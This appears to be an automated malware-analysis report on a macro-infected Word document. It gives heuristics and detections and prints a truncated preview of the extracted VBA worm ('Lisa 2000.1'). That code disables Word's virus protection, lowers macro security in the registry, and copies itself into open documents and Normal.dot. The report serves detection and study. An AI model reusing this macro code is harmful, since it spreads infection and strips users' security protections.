Verdict: MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros. The 'Document_Open' macro is configured to execute automatically; it disables virus protection and attempts to modify security settings. The ClamAV detection 'Win.Worm.VBS-213' and the presence of a 'CreateObject' call strongly suggest execution of a malicious script designed to download and execute a secondary payload. The macro also attempts to set the Word 2000 macro security level to 1, which is a low security setting.
Heuristics (4)

- VBA macros detected (medium, 3 related findings) - OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro (high) - OLE_VBA_DOCOPEN: Document_Open macro
- CreateObject call (high) - OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens (high) - OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9670 bytes |

SHA-256: 1be6f5cf351e5e8c11a45d0443021f5a0565710d26a6e8944f010f19b3b82168

Detection:
- ClamAV: Win.Worm.VBS-213
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script; the original Russian comments, mis-encoded in the extraction, are translated to English here)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
    On Error Resume Next
    buratino
End Sub
Private Sub Document_New()
    On Error Resume Next
    buratino
End Sub
Private Sub Document_Open()
    On Error Resume Next
    poslat
    buratino
End Sub
Private Sub buratino()
    'Lisa 2000.1'
    ' Send all wishes to "Slava_atrancev@mail.ru"
    '___Do not show any errors that arise___
    On Error Resume Next
    '___Disable virus protection for Word 97___
    Application.Options.VirusProtection = False
    '___Disable virus protection for Word 2000___
    System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security", "level") = 1
    '___Version update___
    t = Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.countoflines
    For nb = 1 To t
        If Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(nb, 1) = "'Lisa 2000'" Then
            GoTo faan
        End If
    Next nb
    GoTo foon
faan:
    For gb = 1 To t
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines (1)
    Next gb
foon:
    s = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.countoflines
    d = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, s)
    For k = 1 To Application.Documents.Count
        t = Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.countoflines
        If t > 0 Then
            For nb = 1 To t
                If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(nb, 1) = "'Lisa 2000'" Then
                    GoTo faan1
                End If
            Next nb
            GoTo foon1
faan1:
            For gb = 1 To t
                Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines (1)
            Next gb
foon1:
        End If
    Next k
    '___Infect open documents___
    s = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.countoflines
    d = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, s)
    For k = 1 To Application.Documents.Count
        t = Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.countoflines
        If t = 0 Then
            Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, d
            '___Remove stealth mode from the infected file___
            Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 22
        End If
    Next k
    '___Infect Normal.dot (autoload)___
    t = Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.countoflines
    If t = 0 Then
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, d
        '___Stealth mode___
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "End Sub"
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "Application.ShowVisualBasicEditor = True"
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "End If"
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "Next X"
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "Next nb"
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "End If"
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "Application.Documents.Item(X).Saved = True"
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "Application.Documents.Item(X).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, m"
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "If Application.Documents.Item(X).VBProject.VBComponents.Item(1).CodeModule.Lines(nb, 1) =" + Chr(34) + Chr(39) + "Lisa 2000.1" + Chr(39) + Chr(34) + " Then"
        Application.NormalTemp
```

... (truncated)